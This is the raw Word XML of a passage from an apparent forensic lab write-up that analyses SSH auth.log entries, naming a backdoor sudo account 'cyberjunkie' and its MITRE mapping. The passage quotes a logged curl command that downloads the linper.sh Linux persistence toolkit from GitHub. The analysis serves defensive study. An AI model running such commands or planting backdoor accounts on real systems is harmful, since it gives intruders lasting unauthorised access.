      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session 37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was opened without an immediate disconnect, indicating a stable manual interactive session. Session 37 is therefore identified as the attacker’s actual working session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BDFE4C">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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27"/>
        <w:gridCol w:w="5823"/>
      </w:tblGrid>
      <w:tr w14:paraId="0CD88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27"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603E4BCC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attacker’s SSH Session Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5823"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0B5AEA50">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="205524E2">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F55ED9C">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify the Backdoor Account Created for Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697307DE">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Within Session 37, the auth.log records user management activity. Filtering for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"useradd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"usermod"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events revealed the attacker’s persistence strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5499E2AF">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="2990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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5CBCC">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 7: auth.log entries showing creation of cyberjunkie and addition to the sudo group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAE4AF">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The logs confirm that the attacker created a new local user account named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyberjunkie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and immediately added it to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This grants the account full administrative privileges, allowing the attacker to maintain persistent access to the system even if the root account password were to be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7B410">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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650"/>
      </w:tblGrid>
      <w:tr w14:paraId="3B57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7DF71E25">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Backdoor Account Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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79050B7A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cyberjunkie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A90F07B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C569DAC">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Sub-Technique for Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C338A4">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The attacker established persistence by creating a new local user account on the compromised Linux system. According to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, this maps to technique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T1136 — Create Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since the account was created locally on the Linux system rather than through a domain or cloud service, the specific sub-technique is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T1136.001 — Create Account: Local Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This method allows long-term access without relying on the initially compromised root credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D36B1">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5848350" cy="3286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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5848350" cy="3286125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF8982">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 8: MITRE ATT&amp;CK framework entry for T1136.001 — Create Account: Local Account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8E05B">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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57"/>
        <w:gridCol w:w="5893"/>
      </w:tblGrid>
      <w:tr w14:paraId="7433C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57"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47558150">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK Sub-Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5893"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76FE2EA6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1136.001 — Create Account: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18A4CF7C">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BDD053">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify When the Attacker’s First SSH Session Ended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F446C">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To determine when Session 37 was closed, the auth.log was filtered for session closure events associated with the session ID. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"session closed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> event for Session 37 was located in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53D9FA">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="2990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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD58EB">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 9: auth.log entry showing Session 37 closed at 06:37:24 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED7A83">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The log confirms that the attacker’s interactive root session lasted approximately </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 minutes and 39 seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — from 06:32:45 to 06:37:24. During this window the attacker created the backdoor account and added it to the sudo group before terminating the root session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BA245">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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65"/>
        <w:gridCol w:w="6285"/>
      </w:tblGrid>
      <w:tr w14:paraId="3F7DF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5"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76EB1D01">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Session 37 End Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6285"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207A8334">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2024-03-06 06:37:24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BE7D18C">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F2BC49">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify the sudo Command Used to Download a Persistence Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D50468">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After the root session ended, the attacker logged back in using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyberjunkie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor account. The auth.log records sudo activity, and a sudo command was executed to download a script from a remote GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F828E48">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="2990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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027830C">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 10: auth.log entry showing cyberjunkie executing sudo curl to download linper.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE00699">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The full command executed was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7D451">
      <w:pPr>
        <w:shd w:val="clear" w:fill="F0F4F8"/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BBB9E4">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B36655">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The script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linper.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linux Persistence toolkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> developed by montysecurity — an open-source tool designed to install multiple persistence mechanisms on a compromised Linux system. Its use indicates the attacker intended to establish long-term, multi-layered persistence beyond the backdoor account alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F886BC">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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15"/>
        <w:gridCol w:w="8103"/>
      </w:tblGrid>
      <w:tr w14:paraId="02EF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5"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62E3319F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
